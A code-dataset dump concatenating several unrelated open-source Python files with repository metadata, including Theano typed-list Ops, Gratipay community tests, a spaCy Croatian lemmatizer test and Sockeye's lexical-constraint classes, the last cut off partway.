"""Generates list of routers with their network losses from the input csv"""
network_loss = {}
network_loss_data = pd.read_csv(self.data['network_loss_data'])
self.verify_csv_input(network_loss_data, 'network_loss_data')
# For all columns in csv
for index in range(len(network_loss_data.columns)):
name = network_loss_data.columns[index]
# Insert loss value into data
data_index = self.data["batch_index"] if self.batch_mode else 0
network_loss[str(name)] = \
float(network_loss_data.iloc[data_index, index])
self.data['network_loss_values'] = network_loss
def generate_network_delays(self):
"""Generates list of routers with their network delays from the input csv"""
network_delay = {}
network_delay_data = pd.read_csv(self.data['network_delay_data'])
self.verify_csv_input(network_delay_data, 'network_delay_data')
# For all columns in csv
for index in range(len(network_delay_data.columns)):
name = network_delay_data.columns[index]
# Insert tank : value into data
data_index = self.data["batch_index"] if self.batch_mode else 0
network_delay[str(name)] = \
str(network_delay_data.iloc[data_index, index]) + "ms"
self.data['network_delay_values'] = network_delay
def verify_csv_input(self, dataframe, data):
"""
Verifies the csv files have the proper number of rows for a simulation
:param dataframe: pandas dataframe containing csv data
:param data: name of data that is being verified
"""
num_rows = len(dataframe)
if self.batch_mode:
if num_rows < self.data['batch_simulations']:
raise NotEnoughInitialValues("Provided csv has fewer rows than number of batch simulations: " + data)
else:
if num_rows <= 0:
raise NotEnoughInitialValues("Provided csv has no data: " + data)
| 36.773504 | 117 | 0.59756 |
826c1e2053a7354e3b2519acb79022433b1a13ca | 18,311 | py | Python | theano/typed_list/basic.py | bridgeland/Theano-PyMC | ddfbde2d03061dead7190a99b78c7cef7896bd04 | [
"BSD-3-Clause"
] | null | null | null | theano/typed_list/basic.py | bridgeland/Theano-PyMC | ddfbde2d03061dead7190a99b78c7cef7896bd04 | [
"BSD-3-Clause"
] | null | null | null | theano/typed_list/basic.py | bridgeland/Theano-PyMC | ddfbde2d03061dead7190a99b78c7cef7896bd04 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from .type import TypedListType
import theano
from theano.gof import Apply, Constant, Op, Variable
from theano.tensor.type_other import SliceType
from theano import tensor as T
from theano.compile.debugmode import _lessbroken_deepcopy
class _typed_list_py_operators:
def __getitem__(self, index):
return getitem(self, index)
def __len__(self):
return length(self)
def append(self, toAppend):
return append(self, toAppend)
def extend(self, toAppend):
return extend(self, toAppend)
def insert(self, index, toInsert):
return insert(self, index, toInsert)
def remove(self, toRemove):
return remove(self, toRemove)
def reverse(self):
return reverse(self)
def count(self, elem):
return count(self, elem)
# name "index" is already used by an attribute
def ind(self, elem):
return index_(self, elem)
ttype = property(lambda self: self.type.ttype)
dtype = property(lambda self: self.type.ttype.dtype)
ndim = property(lambda self: self.type.ttype.ndim + 1)
class TypedListVariable(_typed_list_py_operators, Variable):
"""
Subclass to add the typed list operators to the basic `Variable` class.
"""
TypedListType.Variable = TypedListVariable
class TypedListConstant(_typed_list_py_operators, Constant):
"""
Subclass to add the typed list operators to the basic `Variable` class.
"""
TypedListType.Constant = TypedListConstant
class GetItem(Op):
# See doc in instance of this Op or function after this class definition.
view_map = {0: [0]}
__props__ = ()
def make_node(self, x, index):
assert isinstance(x.type, TypedListType)
if not isinstance(index, Variable):
if isinstance(index, slice):
index = Constant(SliceType(), index)
return Apply(self, [x, index], [x.type()])
else:
index = T.constant(index, ndim=0, dtype="int64")
return Apply(self, [x, index], [x.ttype()])
if isinstance(index.type, SliceType):
return Apply(self, [x, index], [x.type()])
elif isinstance(index, T.TensorVariable) and index.ndim == 0:
assert index.dtype == "int64"
return Apply(self, [x, index], [x.ttype()])
else:
raise TypeError("Expected scalar or slice as index.")
def perform(self, node, inputs, outputs):
(x, index) = inputs
(out,) = outputs
if not isinstance(index, slice):
index = int(index)
out[0] = x[index]
def __str__(self):
return self.__class__.__name__
def c_code(self, node, name, inp, out, sub):
x_name, index = inp[0], inp[1]
output_name = out[0]
fail = sub["fail"]
return (
"""
%(output_name)s = (typeof %(output_name)s) PyList_GetItem( (PyObject*) %(x_name)s, *((npy_int64 *) PyArray_DATA(%(index)s)));
if(%(output_name)s == NULL){
%(fail)s
}
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
getitem = GetItem()
"""
Get specified slice of a typed list.
Parameters
----------
x
Typed list.
index
The index of the value to return from `x`.
"""
class Append(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
# TODO: make destroy_handler support having views and
# destroyed version of multiple inputs.
# self.view_map = {0: [1]}
else:
# TODO: make destroy_handler support multiple view
# self.view_map = {0: [0, 1]}
self.view_map = {0: [0]}
def make_node(self, x, toAppend):
assert isinstance(x.type, TypedListType)
assert x.ttype == toAppend.type, (x.ttype, toAppend.type)
return Apply(self, [x, toAppend], [x.type()])
def perform(self, node, inputs, outputs):
(x, toAppend) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
# need to copy toAppend due to destroy_handler limitation
toAppend = _lessbroken_deepcopy(toAppend)
out[0].append(toAppend)
def __str__(self):
return self.__class__.__name__
# DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend().
def _c_code_(self, node, name, inp, out, sub):
x_name, toAppend = inp[0], inp[1]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
if(%(output_name)s==NULL){
%(fail)s
};
if(PyList_Append( (PyObject*) %(output_name)s,(PyObject*) %(toAppend)s)){
%(fail)s
};
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
append = Append()
"""
Append an element at the end of another list.
Parameters
----------
x
The base typed list.
y
The element to append to `x`.
"""
class Extend(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
# TODO: make destroy_handler support having views and
# destroyed version of multiple inputs.
# self.view_map = {0: [1]}
else:
# TODO: make destroy_handler support multiple view
# self.view_map = {0: [0, 1]}
self.view_map = {0: [0]}
def make_node(self, x, toAppend):
assert isinstance(x.type, TypedListType)
assert x.type == toAppend.type
return Apply(self, [x, toAppend], [x.type()])
def perform(self, node, inputs, outputs):
(x, toAppend) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
# need to copy toAppend due to destroy_handler limitation
if toAppend:
o = out[0]
for i in toAppend:
o.append(_lessbroken_deepcopy(i))
def __str__(self):
return self.__class__.__name__
# DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend().
def _c_code_(self, node, name, inp, out, sub):
x_name, toAppend = inp[0], inp[1]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
int i =0;
int length = PyList_GET_SIZE((PyObject*) %(toAppend)s);
if(%(output_name)s==NULL){
%(fail)s
};
for(i; i < length; i++){
if(PyList_Append( (PyObject*) %(output_name)s,(PyObject*) PyList_GetItem((PyObject*) %(toAppend)s,i))==-1){
%(fail)s
};
}
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version_(self):
return (1,)
extend = Extend()
"""
Append all elements of a list at the end of another list.
Parameters
----------
x
The typed list to extend.
toAppend
The typed list that will be added at the end of `x`.
"""
class Insert(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
# TODO: make destroy_handler support having views and
# destroyed version of multiple inputs.
# self.view_map = {0: [2]}
else:
# TODO: make destroy_handler support multiple view
# self.view_map = {0: [0, 2]}
self.view_map = {0: [0]}
def make_node(self, x, index, toInsert):
assert isinstance(x.type, TypedListType)
assert x.ttype == toInsert.type
if not isinstance(index, Variable):
index = T.constant(index, ndim=0, dtype="int64")
else:
assert index.dtype == "int64"
assert isinstance(index, T.TensorVariable) and index.ndim == 0
return Apply(self, [x, index, toInsert], [x.type()])
def perform(self, node, inputs, outputs):
(x, index, toInsert) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
# need to copy toAppend due to destroy_handler limitation
toInsert = _lessbroken_deepcopy(toInsert)
out[0].insert(index, toInsert)
def __str__(self):
return self.__class__.__name__
# DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend().
def _c_code_(self, node, name, inp, out, sub):
x_name, index, toInsert = inp[0], inp[1], inp[2]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
if(%(output_name)s==NULL){
%(fail)s
};
if(PyList_Insert((PyObject*) %(output_name)s, *((npy_int64 *) PyArray_DATA(%(index)s)), (PyObject*) %(toInsert)s)==-1){
%(fail)s
};
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
insert = Insert()
"""
Insert an element at an index in a typed list.
Parameters
----------
x
The typed list to modify.
index
The index where to put the new element in `x`.
toInsert
The new element to insert.
"""
class Remove(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
else:
self.view_map = {0: [0]}
def make_node(self, x, toRemove):
assert isinstance(x.type, TypedListType)
assert x.ttype == toRemove.type
return Apply(self, [x, toRemove], [x.type()])
def perform(self, node, inputs, outputs):
(x, toRemove) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
"""
Inelegant workaround for ValueError: The truth value of an
array with more than one element is ambiguous. Use a.any() or a.all()
being thrown when trying to remove a matrix from a matrices list.
"""
for y in range(out[0].__len__()):
if node.inputs[0].ttype.values_eq(out[0][y], toRemove):
del out[0][y]
break
def __str__(self):
return self.__class__.__name__
remove = Remove()
"""Remove an element from a typed list.
Parameters
----------
x
The typed list to be changed.
toRemove
An element to be removed from the typed list.
We only remove the first instance.
Notes
-----
Python implementation of remove doesn't work when we want to remove an ndarray
from a list. This implementation works in that case.
"""
class Reverse(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
else:
self.view_map = {0: [0]}
def make_node(self, x):
assert isinstance(x.type, TypedListType)
return Apply(self, [x], [x.type()])
def perform(self, node, inp, outputs):
(out,) = outputs
if not self.inplace:
out[0] = list(inp[0])
else:
out[0] = inp[0]
out[0].reverse()
def __str__(self):
return self.__class__.__name__
def c_code(self, node, name, inp, out, sub):
x_name = inp[0]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
if(%(output_name)s==NULL){
%(fail)s
};
if(PyList_Reverse((PyObject*) %(output_name)s)==-1){
%(fail)s
};
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
reverse = Reverse()
"""
Reverse the order of a typed list.
Parameters
----------
x
The typed list to be reversed.
"""
class Index(Op):
# See doc in instance of this Op after the class definition.
__props__ = ()
def make_node(self, x, elem):
assert isinstance(x.type, TypedListType)
assert x.ttype == elem.type
return Apply(self, [x, elem], [T.scalar()])
def perform(self, node, inputs, outputs):
"""
Inelegant workaround for ValueError: The truth value of an
array with more than one element is ambiguous. Use a.any() or a.all()
being thrown when trying to remove a matrix from a matrices list
"""
(x, elem) = inputs
(out,) = outputs
for y in range(len(x)):
if node.inputs[0].ttype.values_eq(x[y], elem):
out[0] = np.asarray(y, dtype=theano.config.floatX)
break
def __str__(self):
return self.__class__.__name__
index_ = Index()
class Count(Op):
# See doc in instance of this Op after the class definition.
__props__ = ()
def make_node(self, x, elem):
assert isinstance(x.type, TypedListType)
assert x.ttype == elem.type
return Apply(self, [x, elem], [T.scalar()])
def perform(self, node, inputs, outputs):
"""
Inelegant workaround for ValueError: The truth value of an
array with more than one element is ambiguous. Use a.any() or a.all()
being thrown when trying to remove a matrix from a matrices list
"""
(x, elem) = inputs
(out,) = outputs
out[0] = 0
for y in range(len(x)):
if node.inputs[0].ttype.values_eq(x[y], elem):
out[0] += 1
out[0] = np.asarray(out[0], dtype=theano.config.floatX)
def __str__(self):
return self.__class__.__name__
count = Count()
"""
Count the number of times an element is in the typed list.
Parameters
----------
x
The typed list to look into.
elem
The element we want to count in list.
The elements are compared with equals.
Notes
-----
Python implementation of count doesn't work when we want to count an ndarray
from a list. This implementation works in that case.
"""
class Length(Op):
# See doc in instance of this Op after the class definition.
__props__ = ()
def make_node(self, x):
assert isinstance(x.type, TypedListType)
return Apply(self, [x], [T.scalar(dtype="int64")])
def perform(self, node, x, outputs):
(out,) = outputs
out[0] = np.asarray(len(x[0]), "int64")
def __str__(self):
return self.__class__.__name__
def c_code(self, node, name, inp, out, sub):
x_name = inp[0]
output_name = out[0]
fail = sub["fail"]
return (
"""
if(!%(output_name)s)
%(output_name)s=(PyArrayObject*)PyArray_EMPTY(0, NULL, NPY_INT64, 0);
((npy_int64*)PyArray_DATA(%(output_name)s))[0]=PyList_Size((PyObject*)%(x_name)s);
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
length = Length()
"""
Returns the size of a list.
Parameters
----------
x
Typed list.
"""
class MakeList(Op):
__props__ = ()
def make_node(self, a):
assert isinstance(a, (tuple, list))
a2 = []
for elem in a:
if not isinstance(elem, theano.gof.Variable):
elem = theano.tensor.as_tensor_variable(elem)
a2.append(elem)
if not all(a2[0].type == elem.type for elem in a2):
raise TypeError("MakeList need all input variable to be of the same type.")
tl = theano.typed_list.TypedListType(a2[0].type)()
return Apply(self, a2, [tl])
def perform(self, node, inputs, outputs):
(out,) = outputs
# We need to make sure that we don't get a view on our inputs
out[0] = [_lessbroken_deepcopy(inp) for inp in inputs]
make_list = MakeList()
"""
Build a Python list from those Theano variables.
Parameters
----------
a : tuple/list of Theano variable
Notes
-----
All Theano variables must have the same type.
"""
| 26.614826 | 133 | 0.551253 |
a123565e0a473b72f9d3347219d699f273753192 | 2,566 | py | Python | tests/py/test_communities.py | webmaven/gratipay.com | 31f6bcf903029895a4c56290aedde755e852c82f | [
"CC0-1.0"
] | 1 | 2019-10-09T10:13:53.000Z | 2019-10-09T10:13:53.000Z | tests/py/test_communities.py | webmaven/gratipay.com | 31f6bcf903029895a4c56290aedde755e852c82f | [
"CC0-1.0"
] | null | null | null | tests/py/test_communities.py | webmaven/gratipay.com | 31f6bcf903029895a4c56290aedde755e852c82f | [
"CC0-1.0"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.testing import Harness
class Tests(Harness):
def setUp(self):
Harness.setUp(self)
# Alice joins a community.
self.alice = self.make_participant("alice", claimed_time='now', last_bill_result='')
self.client.POST( '/for/communities.json'
, {'name': 'something', 'is_member': 'true'}
, auth_as='alice'
)
def test_community_member_shows_up_on_community_listing(self):
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 2 # entry in New Participants
def test_givers_show_up_on_community_page(self):
# Alice tips bob.
bob = self.make_participant('bob', claimed_time='now')
self.alice.set_tip_to(bob, '1.00')
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 4 # entries in both New Participants and Givers
assert 'bob' not in html
def test_givers_dont_show_up_if_they_give_zero(self):
# Alice tips bob.
bob = self.make_participant('bob', claimed_time='now')
self.alice.set_tip_to(bob, '1.00')
self.alice.set_tip_to(bob, '0.00')
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 2 # entry in New Participants only
assert 'bob' not in html
def test_receivers_show_up_on_community_page(self):
# Bob tips alice.
bob = self.make_participant("bob", claimed_time='now', last_bill_result='')
bob.set_tip_to(self.alice, '1.00')
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 4 # entries in both New Participants and Receivers
assert 'bob' not in html
def test_receivers_dont_show_up_if_they_receive_zero(self):
# Bob tips alice.
bob = self.make_participant("bob", claimed_time='now', last_bill_result='')
bob.set_tip_to(self.alice, '1.00')
bob.set_tip_to(self.alice, '0.00') # zero out bob's tip
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 2 # entry in New Participants only
assert 'bob' not in html
def test_community_listing_works_for_pristine_community(self):
html = self.client.GET('/for/pristine/', want='response.body')
assert 'first one here' in html
| 38.298507 | 92 | 0.641076 |
6b9f8a72b072dc7b30c9a5d98f4e41f96f7135da | 475 | py | Python | spacy/tests/lang/hr/test_lemma.py | jaydeepborkar/spaCy | 16aa092fb5cffb5ec7079951ea0c04cb96733b3e | [
"MIT"
] | 1 | 2020-01-29T19:02:04.000Z | 2020-01-29T19:02:04.000Z | spacy/tests/lang/hr/test_lemma.py | jaydeepborkar/spaCy | 16aa092fb5cffb5ec7079951ea0c04cb96733b3e | [
"MIT"
] | 1 | 2021-08-16T13:39:17.000Z | 2021-08-16T13:39:40.000Z | spacy/tests/lang/hr/test_lemma.py | jaydeepborkar/spaCy | 16aa092fb5cffb5ec7079951ea0c04cb96733b3e | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import unicode_literals
import pytest
@pytest.mark.parametrize(
"string,lemma",
[
("trčao", "trčati"),
("adekvatnim", "adekvatan"),
("dekontaminacijama", "dekontaminacija"),
("filologovih", "filologov"),
("je", "biti"),
("se", "sebe"),
],
)
def test_hr_lemmatizer_lookup_assigns(hr_tokenizer, string, lemma):
tokens = hr_tokenizer(string)
assert tokens[0].lemma_ == lemma
| 22.619048 | 67 | 0.612632 |
2500c43c5e6f390a46ae0ff53464de95586d2b77 | 28,775 | py | Python | sockeye/lexical_constraints.py | tholiao/sockeye | f33b600dc77ae9f295c05015e2af9045f3a74088 | [
"Apache-2.0"
] | 8 | 2019-10-02T09:14:31.000Z | 2020-07-07T09:40:04.000Z | sockeye/lexical_constraints.py | tholiao/sockeye | f33b600dc77ae9f295c05015e2af9045f3a74088 | [
"Apache-2.0"
] | 2 | 2021-03-07T08:34:42.000Z | 2021-03-25T22:57:37.000Z | sockeye/lexical_constraints.py | tholiao/sockeye | f33b600dc77ae9f295c05015e2af9045f3a74088 | [
"Apache-2.0"
] | 4 | 2019-10-10T06:34:41.000Z | 2021-07-19T09:11:20.000Z | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import copy
import logging
from operator import attrgetter
from typing import Dict, List, Optional, Tuple, Set
import mxnet as mx
import numpy as np
logger = logging.getLogger(__name__)
# Represents a list of raw constraints for a sentence. Each constraint is a list of target-word IDs.
RawConstraintList = List[List[int]]
class AvoidTrie:
"""
Represents a set of phrasal constraints for an input sentence.
These are organized into a trie.
"""
def __init__(self,
raw_phrases: Optional[RawConstraintList] = None) -> None:
self.final_ids = set() # type: Set[int]
self.children = {} # type: Dict[int,'AvoidTrie']
if raw_phrases:
for phrase in raw_phrases:
self.add_phrase(phrase)
def __str__(self) -> str:
s = '({}'.format(list(self.final_ids))
for child_id in self.children.keys():
s += ' -> {} {}'.format(child_id, self.children[child_id])
s += ')'
return s
def __len__(self) -> int:
"""
Returns the number of avoid phrases represented in the trie.
"""
phrase_count = len(self.final_ids)
for child in self.children.values():
phrase_count += len(child)
return phrase_count
def add_trie(self,
trie: 'AvoidTrie',
phrase: Optional[List[int]] = None) -> None:
self.final_ids |= trie.final()
for child_id, child in trie.children.items():
if child_id not in self.children:
self.children[child_id] = AvoidTrie()
self.children[child_id].add_trie(child)
def add_phrase(self,
phrase: List[int]) -> None:
"""
Recursively adds a phrase to this trie node.
:param phrase: A list of word IDs to add to this trie node.
"""
if len(phrase) == 1:
self.final_ids.add(phrase[0])
else:
next_word = phrase[0]
if next_word not in self.children:
self.children[next_word] = AvoidTrie()
self.step(next_word).add_phrase(phrase[1:])
def step(self, word_id: int) -> Optional['AvoidTrie']:
"""
Returns the child node along the requested arc.
        :param word_id: The word ID of the arc to follow.
:return: The child node along the requested arc, or None if no such arc exists.
"""
return self.children.get(word_id, None)
def final(self) -> Set[int]:
"""
Returns the set of final ids at this node.
:return: The set of word IDs that end a constraint at this state.
"""
return self.final_ids
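# A minimal sketch of the trie above (word IDs are illustrative; defined but
# never called):
def _avoid_trie_sketch():
    trie = AvoidTrie([[3, 4], [5]])
    assert len(trie) == 2               # two phrases in total
    assert trie.final() == {5}          # single-word phrases end at the root
    assert trie.step(3).final() == {4}  # 4 completes the phrase "3 4"
    assert trie.step(7) is None         # no phrase starts with 7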
class AvoidState:
"""
Represents the state of a hypothesis in the AvoidTrie.
The offset is used to return actual positions in the one-dimensionally-resized array that
get set to infinity.
:param avoid_trie: The trie containing the phrases to avoid.
:param state: The current state (defaults to root).
"""
def __init__(self,
avoid_trie: AvoidTrie,
state: AvoidTrie = None) -> None:
self.root = avoid_trie
self.state = state if state else self.root
def consume(self, word_id: int) -> 'AvoidState':
"""
Consumes a word, and updates the state based on it. Returns new objects on a state change.
The next state for a word can be tricky. Here are the cases:
(1) If the word is found in our set of outgoing child arcs, we take that transition.
(2) If the word is not found, and we are not in the root state, we need to reset.
This means we pretend we were in the root state, and see if we can take a step
(3) Otherwise, if we are not already in the root state (i.e., we were partially through
the trie), we need to create a new object whose state is the root state
(4) Finally, if we couldn't advance and were already in the root state, we can reuse
this object.
:param word_id: The word that was just generated.
"""
if word_id in self.state.children:
return AvoidState(self.root, self.state.step(word_id))
elif word_id in self.root.children:
return AvoidState(self.root, self.root.step(word_id))
elif self.state != self.root:
return AvoidState(self.root, self.root)
else:
return self
def avoid(self) -> Set[int]:
"""
Returns a set of word IDs that should be avoided. This includes the set of final states from the
root node, which are single tokens that must never be generated.
:return: A set of integers representing words that must not be generated next by this hypothesis.
"""
return self.root.final() | self.state.final()
def __str__(self) -> str:
return str(self.state)
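# A minimal sketch of consume()/avoid() above (word IDs are illustrative;
# defined but never called):
def _avoid_state_sketch():
    state = AvoidState(AvoidTrie([[3, 4], [5]]))
    assert state.avoid() == {5}        # 5 is banned from the root
    state = state.consume(3)           # now inside the phrase "3 4"
    assert state.avoid() == {4, 5}     # 4 would complete the phrase
    state = state.consume(8)           # 8 breaks the phrase, back to the root
    assert state.avoid() == {5}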
class AvoidBatch:
"""
Represents a set of phrasal constraints for all items in the batch.
For each hypotheses, there is an AvoidTrie tracking its state.
:param batch_size: The batch size.
:param beam_size: The beam size.
:param avoid_list: The list of lists (raw phrasal constraints as IDs, one for each item in the batch).
:param global_avoid_trie: A translator-level vocabulary of items to avoid.
"""
def __init__(self,
batch_size: int,
beam_size: int,
avoid_list: Optional[List[RawConstraintList]] = None,
global_avoid_trie: Optional[AvoidTrie] = None) -> None:
self.global_avoid_states = [] # type: List[AvoidState]
self.local_avoid_states = [] # type: List[AvoidState]
# Store the global trie for each hypothesis
if global_avoid_trie is not None:
self.global_avoid_states = [AvoidState(global_avoid_trie)] * batch_size * beam_size
# Store the sentence-level tries for each item in their portions of the beam
if avoid_list is not None:
for raw_phrases in avoid_list:
self.local_avoid_states += [AvoidState(AvoidTrie(raw_phrases))] * beam_size
def reorder(self, indices: mx.nd.NDArray) -> None:
"""
Reorders the avoid list according to the selected row indices.
This can produce duplicates, but this is fixed if state changes occur in consume().
:param indices: An mx.nd.NDArray containing indices of hypotheses to select.
"""
if self.global_avoid_states:
self.global_avoid_states = [self.global_avoid_states[x] for x in indices.asnumpy()]
if self.local_avoid_states:
self.local_avoid_states = [self.local_avoid_states[x] for x in indices.asnumpy()]
def consume(self, word_ids: mx.nd.NDArray) -> None:
"""
Consumes a word for each trie, updating respective states.
:param word_ids: The set of word IDs.
"""
word_ids = word_ids.asnumpy().tolist()
for i, word_id in enumerate(word_ids):
if self.global_avoid_states:
self.global_avoid_states[i] = self.global_avoid_states[i].consume(word_id)
if self.local_avoid_states:
self.local_avoid_states[i] = self.local_avoid_states[i].consume(word_id)
def avoid(self) -> Tuple[Tuple[int], Tuple[int]]:
"""
Assembles a list of per-hypothesis words to avoid. The indices are (x, y) pairs into the scores
array, which has dimensions (beam_size, target_vocab_size). These values are then used by the caller
to set these items to np.inf so they won't be selected. Words to be avoided are selected by
consulting both the global trie of phrases and the sentence-specific one.
:return: Two lists of indices: the x coordinates and y coordinates.
"""
to_avoid = set() # type: Set[Tuple[int, int]]
for i, state in enumerate(self.global_avoid_states):
for word_id in state.avoid():
if word_id > 0:
to_avoid.add((i, word_id))
for i, state in enumerate(self.local_avoid_states):
for word_id in state.avoid():
if word_id > 0:
to_avoid.add((i, word_id))
return tuple(zip(*to_avoid)) # type: ignore
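# A minimal sketch of AvoidBatch (one sentence, beam of two, illustrative IDs;
# defined but never called): hypothesis 0 has just produced word 3 and
# hypothesis 1 word 7.
def _avoid_batch_sketch():
    batch = AvoidBatch(batch_size=1, beam_size=2, avoid_list=[[[3, 4], [5]]])
    batch.consume(mx.nd.array([3, 7], dtype='int32'))
    # Hypothesis 0 must avoid 4 (to block "3 4") and 5; hypothesis 1 only 5.
    assert set(zip(*batch.avoid())) == {(0, 4), (0, 5), (1, 5)}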
class ConstrainedHypothesis:
"""
Represents a set of words and phrases that must appear in the output.
A constraint is of two types: sequence or non-sequence.
A non-sequence constraint is a single word and can therefore be followed by anything,
whereas a sequence constraint must be followed by a particular word (the next word in the sequence).
This class also records which constraints have been met.
A list of raw constraints is maintained internally as two parallel arrays. The following raw constraint
represents two phrases that must appear in the output: 14 and 19 35 14.
raw constraint: [[14], [19, 35, 14]]
This is represented internally as:
constraints: [14 19 35 14]
is_sequence: [False False True True]
That is, the constraints are simply concatenated, and we maintain a parallel array indicating whether each
token ID must be followed by the next token ID. The same token ID can be present any number of times.
    :param constraint_list: A list of zero or more raw constraints (each represented as a list of integers).
:param eos_id: The end-of-sentence ID.
"""
def __init__(self,
constraint_list: RawConstraintList,
eos_id: int) -> None:
# `constraints` records the words of the constraints, as a list (duplicates allowed).
# `is_sequence` is a parallel array that records, for each corresponding constraint,
# whether the current word is the non-final word of a phrasal constraint.
self.constraints = [] # type: List[int]
self.is_sequence = [] # type: List[bool]
for phrase in constraint_list:
self.constraints += phrase
self.is_sequence += [True] * len(phrase)
self.is_sequence[-1] = False
self.eos_id = eos_id
# no constraints have been met
self.met = [False for x in self.constraints]
self.last_met = -1
def __len__(self) -> int:
"""
:return: The number of constraints.
"""
return len(self.constraints)
def __str__(self) -> str:
s = []
for i, word_id in enumerate(self.constraints):
s.append(str(word_id) if self.met[i] is False else 'X')
if self.is_sequence[i]:
s.append('->')
return ' '.join(s)
def size(self) -> int:
"""
:return: the number of constraints
"""
return len(self.constraints)
def num_met(self) -> int:
"""
:return: the number of constraints that have been met.
"""
return sum(self.met)
def num_needed(self) -> int:
"""
:return: the number of un-met constraints.
"""
return self.size() - self.num_met()
def allowed(self) -> Set[int]:
"""
Returns the set of constrained words that could follow this one.
For unfinished phrasal constraints, it is the next word in the phrase.
In other cases, it is the list of all unmet constraints.
If all constraints are met, an empty set is returned.
        :return: The set of allowed next words, or an empty set if all constraints have been met.
"""
items = set() # type: Set[int]
# Add extensions of a started-but-incomplete sequential constraint
if self.last_met != -1 and self.is_sequence[self.last_met] == 1:
word_id = self.constraints[self.last_met + 1]
if word_id != self.eos_id or self.num_needed() == 1:
items.add(word_id)
# Add all constraints that aren't non-initial sequences
else:
for i, word_id in enumerate(self.constraints):
if not self.met[i] and (i == 0 or not self.is_sequence[i - 1]):
if word_id != self.eos_id or self.num_needed() == 1:
items.add(word_id)
return items
def finished(self) -> bool:
"""
Return true if all the constraints have been met.
:return: True if all the constraints are met.
"""
return self.num_needed() == 0
def is_valid(self, wordid) -> bool:
"""
Ensures </s> is only generated when the hypothesis is completed.
:param wordid: The wordid to validate.
:return: True if all constraints are already met or the word ID is not the EOS id.
"""
return self.finished() or wordid != self.eos_id or (self.num_needed() == 1 and self.eos_id in self.allowed())
def advance(self, word_id: int) -> 'ConstrainedHypothesis':
"""
Updates the constraints object based on advancing on word_id.
There is a complication, in that we may have started but not
yet completed a multi-word constraint. We need to allow constraints
to be added as unconstrained words, so if the next word is
invalid, we must "back out" of the current (incomplete) phrase,
re-setting all of its words as unmet.
:param word_id: The word ID to advance on.
:return: A deep copy of the object, advanced on word_id.
"""
obj = copy.deepcopy(self)
# First, check if we're updating a sequential constraint.
if obj.last_met != -1 and obj.is_sequence[obj.last_met] == 1:
if word_id == obj.constraints[obj.last_met + 1]:
# Here, the word matches what we expect next in the constraint, so we update everything
obj.met[obj.last_met + 1] = True
obj.last_met += 1
else:
# Here, the word is not the expected next word of the constraint, so we back out of the constraint.
index = obj.last_met
while obj.is_sequence[index]:
obj.met[index] = False
index -= 1
obj.last_met = -1
# If not, check whether we're meeting a single-word constraint
else:
# Build a list from all constraints of tuples of the
